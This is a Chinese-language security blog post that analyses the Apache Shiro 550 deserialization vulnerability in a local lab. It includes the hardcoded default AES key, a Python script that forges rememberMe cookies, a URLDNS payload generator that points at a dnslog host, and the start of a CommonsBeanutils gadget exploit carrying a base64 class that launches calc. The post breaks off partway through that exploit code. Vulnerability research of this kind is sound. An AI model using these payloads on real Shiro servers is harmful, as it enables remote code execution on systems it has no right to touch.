<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="shiro550分析"><meta name="keywords" content="shiro"><meta name="author" content="Credink"><meta name="copyright" content="Credink"><title>shiro550分析 | Credink's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '6.1.0'
} </script><meta name="generator" content="Hexo 6.1.0"><link rel="alternate" href="/atom.xml" title="Credink's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">漏洞简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">2.</span> <span class="toc-text">环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8B%E8%BD%BD%E9%85%8D%E7%BD%AEshiro"><span class="toc-number">2.1.</span> <span class="toc-text">下载配置shiro</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%85%8D%E7%BD%AETomcat"><span class="toc-number">2.2.</span> <span class="toc-text">配置Tomcat</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E9%A1%B9%E7%9B%AE"><span class="toc-number">2.3.</span> <span class="toc-text">启动项目</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E6%80%BB%E7%BB%93"><span class="toc-number">3.1.</span> <span class="toc-text">简单总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E7%A8%8B%E8%B7%9F%E8%B8%AA"><span class="toc-number">3.2.</span> <span class="toc-text">流程跟踪</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AES%E5%AF%86%E9%92%A5"><span class="toc-number">3.3.</span> <span class="toc-text">AES密钥</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Gadget%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">Gadget分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%94%9F%E4%BE%9D%E8%B5%96"><span class="toc-number">4.1.</span> <span class="toc-text">原生依赖</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AES%E5%8A%A0%E5%AF%86%E8%84%9A%E6%9C%AC"><span class="toc-number">4.2.</span> <span class="toc-text">AES加密脚本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URLDNS"><span class="toc-number">4.3.</span> <span class="toc-text">URLDNS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%94%9FCB%E6%94%BB%E5%87%BB"><span class="toc-number">4.4.</span> <span class="toc-text">原生CB攻击</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.</span> <span class="toc-text">参考</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#todo"><span class="toc-number">6.</span> <span class="toc-text">todo</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#CommonCollectionsK1"><span class="toc-number">6.1.</span> <span class="toc-text">CommonCollectionsK1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JRMP%E7%BB%95%E8%BF%87%E9%99%90%E5%88%B6"><span class="toc-number">6.2.</span> <span class="toc-text">JRMP绕过限制</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.jpg"></div><div class="author-info__name text-center">Credink</div><div class="author-info__description text-center">Do it,just do it!</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">3</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">3</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://classic0796.com/">classic0796</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/background.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Credink's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a></span></div><div id="post-info"><div id="post-title">shiro550分析</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2022-04-10</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Java%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">漏洞原理</a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">2.4k</span><span class="post-meta__separator">|</span><span>Reading time: 10 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h1><p>Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。</p>
<p>Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。</p>
<ul>
<li>影响版本 Shiro &lt;&#x3D; 1.2.4</li>
</ul>
<span id="more"></span> 

<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>java1.8+Tomcat8+shiro-root-1.2.4</p>
<p>使用Apache Shiro Quickstart示例页面进行测试（shiro&#x2F;samples&#x2F;web）</p>
<h2 id="下载配置shiro"><a href="#下载配置shiro" class="headerlink" title="下载配置shiro"></a>下载配置shiro</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/apache/shiro.git</span><br><span class="line">git checkout shiro-root-1.2.4  #切换分支</span><br></pre></td></tr></table></figure>

<p>编辑shiro&#x2F;samples&#x2F;web&#x2F;pom.xml，修改jstl的版本为1.2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">	&lt;groupId&gt;javax.servlet&lt;/groupId&gt;</span><br><span class="line">	&lt;artifactId&gt;jstl&lt;/artifactId&gt;</span><br><span class="line">	&lt;version&gt;1.2&lt;/version&gt;</span><br><span class="line">	&lt;scope&gt;runtime&lt;/scope&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<p>编辑shiro&#x2F;pom.xml，修改toolchains对应的jdk版本为1.8（默认是1.6）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;plugin&gt;</span><br><span class="line">  &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;</span><br><span class="line">  &lt;artifactId&gt;maven-toolchains-plugin&lt;/artifactId&gt;</span><br><span class="line">  &lt;version&gt;1.1&lt;/version&gt;</span><br><span class="line">  &lt;configuration&gt;</span><br><span class="line">	&lt;toolchains&gt;</span><br><span class="line">	  &lt;jdk&gt;</span><br><span class="line">		&lt;version&gt;1.8&lt;/version&gt;</span><br><span class="line">		&lt;vendor&gt;sun&lt;/vendor&gt;</span><br><span class="line">	  &lt;/jdk&gt;</span><br><span class="line">	&lt;/toolchains&gt;               </span><br><span class="line">  &lt;/configuration&gt;</span><br><span class="line">  &lt;executions&gt;</span><br><span class="line">	&lt;execution&gt;</span><br><span class="line">	  &lt;goals&gt;</span><br><span class="line">		&lt;goal&gt;toolchain&lt;/goal&gt;</span><br><span class="line">	  &lt;/goals&gt;</span><br><span class="line">	&lt;/execution&gt;</span><br><span class="line">  &lt;/executions&gt;</span><br><span class="line">&lt;/plugin&gt;</span><br></pre></td></tr></table></figure>

<p>有些文章里为了方便演示shiro的原理（讲解shiro时可以先忽略依赖问题，专心讲shiro的漏洞点），把CC依赖也写进shiro&#x2F;pom.xml里了，在&lt;dependencies&gt;&lt;&#x2F;dependencies&gt;内部塞依赖就行，例如下面加入CC4：</p>
<p>note:我这里仅作演示，实际操作并没有加入CC4依赖</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">	&lt;groupId&gt;org.apache.commons&lt;/groupId&gt;</span><br><span class="line">	&lt;artifactId&gt;commons-collections4&lt;/artifactId&gt;</span><br><span class="line">	&lt;version&gt;4.0&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<p>如图所示，添加CC4依赖，同时能看到shiro里自带commons-beanutils依赖：</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407211656478.png"></p>
<p>打开C:\Users\用户名\.m2\，创建toolchains.xml，并写入下面的内容（jdkHome修改为自己的jdk文件夹路径）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;toolchains xmlns=&quot;http://maven.apache.org/TOOLCHAINS/1.1.0&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span><br><span class="line">  xsi:schemaLocation=&quot;http://maven.apache.org/TOOLCHAINS/1.1.0 http://maven.apache.org/xsd/toolchains-1.1.0.xsd&quot;&gt;</span><br><span class="line">  &lt;toolchain&gt;</span><br><span class="line">    &lt;type&gt;jdk&lt;/type&gt;</span><br><span class="line">    &lt;provides&gt;</span><br><span class="line">      &lt;version&gt;1.8&lt;/version&gt;</span><br><span class="line">      &lt;vendor&gt;sun&lt;/vendor&gt;</span><br><span class="line">    &lt;/provides&gt;</span><br><span class="line">    &lt;configuration&gt;</span><br><span class="line">      &lt;jdkHome&gt;C:\Program Files\Java\jdk1.8.0_202\&lt;/jdkHome&gt;</span><br><span class="line">    &lt;/configuration&gt;</span><br><span class="line">  &lt;/toolchain&gt;</span><br><span class="line">&lt;/toolchains&gt;</span><br></pre></td></tr></table></figure>

<h2 id="配置Tomcat"><a href="#配置Tomcat" class="headerlink" title="配置Tomcat"></a>配置Tomcat</h2><p>Run-&gt;Edit Configurations（左上角加号，选择tomcat local）</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407212620016.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407212903204.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407213331902.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407213354928.png"></p>
<h2 id="启动项目"><a href="#启动项目" class="headerlink" title="启动项目"></a>启动项目</h2><p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407213433874.png"></p>
<p>访问<code>http://127.0.0.1:8080/samples_web_war_exploded/</code></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407213803255.png"></p>
<p>点击login链接：<code>http://127.0.0.1:8080/samples_web_war_exploded/login.jsp</code></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220407213828452.png"></p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><h2 id="简单总结"><a href="#简单总结" class="headerlink" title="简单总结"></a>简单总结</h2><p>shiro通过对cookie中的rememberme，来认证用户身份信息</p>
<p><strong>note：有sessionid的时候不会去走rememberme的校验逻辑，测试不要带sessionid</strong></p>
<p>shiro对rememberme字符串做了AES CBC解密后（密钥是固定写死的），直接对解密结果做了反序列化操作</p>
<p>因此，攻击者可以生成恶意序列化字符串，并通过固定的密钥做AES CBC加密，生成恶意rememberme字符串</p>
<p>当shiro检测恶意rememberme字符串时，就会把恶意序列化字符串反序列化，从而被攻击</p>
<h2 id="流程跟踪"><a href="#流程跟踪" class="headerlink" title="流程跟踪"></a>流程跟踪</h2><p>第一次登录后获取到cookie，带着cookie发起request请求（要删除sessionid，避免影响）</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409142850256.png"></p>
<p>在项目里搜索rememberme，发现一个名叫CookieRememberMeMamager的类</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409142947874.png"></p>
<p>在structure视窗里看到有三个跟rememberme有关的函数</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409143315542.png"></p>
<p>依次点过去，看开头的注释，发现分别时“利用模板构造cookie”、“用序列化的结果设置cookie”、“从cookie里获取rememberme字符串，做base64解码后返回”</p>
<p>这里对getRememberedSerializedIdentity打断点：</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409143741100.png"></p>
<p>step over看看base64解码结果被拿去干啥了：</p>
<p>这里如果直接步过convertBytesToPrincipals会发现principals的结果为”root”，即AES解密、反序列化后得到的身份判断结果</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409143936720.png"></p>
<p>进入convertBytesToPrincipals里面看一下具体操作：</p>
<p>convertBytesToPrincipals-&gt;decrypt-&gt;cipherService.decrypt（JcaCipherService.java内部几次函数跳转，做AES CBC解密）</p>
<p>简单来讲，就是对rememberme做AES CBC解密后返回结果</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409144633763.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409144357973.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409145233973.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409145317978.png"></p>
<p>AES解密完之后，回归到convertBytesToPrincipals，对解密结果做反序列化操作（也是漏洞点的反序列化触发位置）</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409145702746.png"></p>
<p>正常反序列化结果如图所示，判断用户是”root”:</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409150040657.png"></p>
<h2 id="AES密钥"><a href="#AES密钥" class="headerlink" title="AES密钥"></a>AES密钥</h2><p>这里的攻击思路很明显了，构造恶意序列化字符串，然后用相同的AES密钥做CBC加密，修改cookie里的rememberme字符串</p>
<p>shiro就会解密后把恶意序列化字符串反序列化</p>
<p>那么这里得去找AES的密钥</p>
<p>decrypt函数里有getDeryptionCipherKey()，明显是获取key的（进入cipherService.decrypt能看到这个传入的就是key）</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409150336465.png"></p>
<p>跟进到getDeryptionCipherKey()发现返回的是私有成员变量decryptionCipherKey</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409150555408.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409150645777.png"></p>
<p>看一眼发现构造函数里通过setCipherKey把一个写死的key（DEFAULT_CIPHER_KEY_BYTES）赋值给decryptionCipherKey</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409150804397.png"></p>
<p>查看发现DEFAULT_CIPHER_KEY_BYTES是固定写死的 “kPH+bIxk5D2deZiIxcaaaA&#x3D;&#x3D;” base64解密结果（也就是AES的固定密钥）</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220409150904921.png"></p>
<h1 id="Gadget分析"><a href="#Gadget分析" class="headerlink" title="Gadget分析"></a>Gadget分析</h1><h2 id="原生依赖"><a href="#原生依赖" class="headerlink" title="原生依赖"></a>原生依赖</h2><p>下载了一个名叫maven helper的插件，在samples&#x2F;web&#x2F;pom.xml点击插件页面查看依赖情况：</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220410092655201.png"></p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220410092718869.png"></p>
<p>发现里面有commons-collections-3和commons-beanutils依赖</p>
<p>但是打包war包时只会把compile和runtime打包，test的属于开发阶段需要使用的，并不会被打包</p>
<p>所以，实战如果对方是shiro原生的话，打CC是打不到的</p>
<p>这里真正的依赖只有commons-beanutils，同时JDK自己的链（URLDNS）也是生效的</p>
<p>补充：为什么很多文章里加入CC4依赖？</p>
<blockquote>
<p>因为ysoserial里原生的exp里只有CommonsCollections2（依赖为CC4）是可以直接打原生shiro的</p>
<p>其他的原生exp，或者是因为依赖问题，或者是因为tomcat里的设计问题等原因，没办法直接用</p>
<p>也就是说，如果用别的CC依赖和ysoserial对应的EXP，得去魔改一下ysoserial对应的EXP才能打成功</p>
<p>所以为了方便演示，很多文章里就加入了CC4依赖，方便用ysoserial的CommonsCollections2演示RCE</p>
</blockquote>
<p>补充：为什么ysoserial的CommonsBeanutils1不能直接打原生shiro？</p>
<blockquote>
<p>ysoserial的CommonsBeanutils1依赖的commons-beanutils版本是1.9.2</p>
<p>shiro原生依赖的commons-beanutils版本是1.8.3</p>
<p>直接用ysoserial会报错serialVersionUID不同：</p>
<p>stream classdesc serialVersionUID &#x3D; -2044202215314119608, local class serialVersionUID &#x3D; -3490850999041592962</p>
</blockquote>
<p>最终，ysoserial原生能起作用的就只剩URLDNS</p>
<p>能打shiro原生的，只有自己去根据CB链，构造攻击exp（保证commons-beanutils版本是1.8.3）</p>
<h2 id="AES加密脚本"><a href="#AES加密脚本" class="headerlink" title="AES加密脚本"></a>AES加密脚本</h2><p>偷懒直接改了别人一个蛮早的用python写的poc，改成读取本地序列化的文件（ser.bin），并输出加密结果了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import sys</span><br><span class="line">import uuid</span><br><span class="line">import base64</span><br><span class="line">import subprocess</span><br><span class="line">from Crypto.Cipher import AES</span><br><span class="line"></span><br><span class="line">def encode_rememberme(): </span><br><span class="line">    with open(&quot;ser.bin&quot;,&quot;rb&quot;) as f:</span><br><span class="line">        serbin = f.read()</span><br><span class="line">    BS = AES.block_size</span><br><span class="line">    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()</span><br><span class="line">    key = base64.b64decode(&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;)</span><br><span class="line">    iv = uuid.uuid4().bytes</span><br><span class="line">    encryptor = AES.new(key, AES.MODE_CBC, iv)</span><br><span class="line">    file_body = pad(serbin)</span><br><span class="line">    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))</span><br><span class="line">    return base64_ciphertext</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    payload = encode_rememberme()</span><br><span class="line">    print(&quot;rememberMe=&#123;0&#125;&quot;.format(payload.decode()))</span><br></pre></td></tr></table></figure>

<h2 id="URLDNS"><a href="#URLDNS" class="headerlink" title="URLDNS"></a>URLDNS</h2><p>把ysoserial里URLDNS的内容拉过来（把里面的url改写成dnslog里获取的内容），把结果序列化之后写为本地ser.bin里</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">public static void main(final String[] args) throws Exception &#123;</span><br><span class="line">    //URLDNS的内容</span><br><span class="line">    URLStreamHandler handler = new URLDNS.SilentURLStreamHandler();</span><br><span class="line"></span><br><span class="line">    HashMap ht = new HashMap(); // HashMap that will contain the URL</span><br><span class="line">    URL u = new URL(null, &quot;http://zoyz12.dnslog.cn&quot;, handler); // URL to use as the Key</span><br><span class="line">    ht.put(u, &quot;http://zoyz12.dnslog.cn&quot;); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.</span><br><span class="line"></span><br><span class="line">    Reflections.setFieldValue(u, &quot;hashCode&quot;, -1); // During the put above, the URL&#x27;s hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.</span><br><span class="line"></span><br><span class="line">    //生成序列化字符串并写入文件</span><br><span class="line">    System.out.println(&quot;serializing payload&quot;);</span><br><span class="line">    byte[] ser = Serializer.serialize(ht);</span><br><span class="line">    FileOutputStream fos = new FileOutputStream(&quot;D:\\Code\\Java\\ysoserial-master\\src\\main\\java\\ysoserial\\payloads\\ser.bin&quot;);</span><br><span class="line">    fos.write(ser);</span><br><span class="line">    fos.flush();</span><br><span class="line">    fos.close();</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>python运行AES加密脚本</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220410095250272.png"></p>
<p>启动服务，修改rememberme（不带sessionid，防止影响身份认证的逻辑），发送后dnslog成功收到信息</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220410095549771.png"></p>
<h2 id="原生CB攻击"><a href="#原生CB攻击" class="headerlink" title="原生CB攻击"></a>原生CB攻击</h2><p>gadget链：</p>
<blockquote>
<p>PriorityQueue.readObject &#x3D;&gt; BeanComparator.compare &#x3D;&gt; PropertyUtils,getProperty &#x3D;&gt; TemplatesImpl.getOutputProperties &#x3D;&gt; TemplatesImpl.newTransformer &#x3D;&gt; defineClass-&gt;newInstance</p>
</blockquote>
<p>如上文“原生依赖”里说的，这里要保证CB依赖的版本一致，因此这里单独创建的项目，在pom里设置好CB版本为1.8.3，CC为3.1：</p>
<p><img src="https://credink.github.io/2022/04/10/shiro550%E5%88%86%E6%9E%90/image-20220410173432469.png"></p>
<p>生成反序列化文件的代码如下：</p>
<p><strong>note:new BeanComparator()时，CB中默认的构造函数存在CC依赖（默认使用的comparator有CC依赖）</strong></p>
<p>所以这里需要用另外一个构造函数，传一个无CC依赖的comparator，从而保证规避CC依赖问题</p>
<p>这里传一个CB里有，或者是JDK里面有的comparator就行</p>
<p>条件：1.继承Comparator接口2.继承Serializable接口</p>
<p>去找同时满足这两条的类，然后找交集，这里选的是AttrCompare</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">public static void main(final String[] args) throws Exception &#123;</span><br><span class="line">    // CC3</span><br><span class="line">    byte[] fileData = new BASE64Decoder().decodeBuffer(&quot;yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEABUhlbGxvAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAOAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEwALAAAABAABAAwAAQAOAA8AAgAJAAAANAACAAIAAAAQKrcAAbgAAkwrEgO2AARXsQAAAAEACgAAABIABAAAABUABAAWAAgAFwAPABgACwAAAAQAAQAQAAEAEQAAAAIAEg==&quot;);// 弹出计算器的序列化字符串</span><br><span class="line">    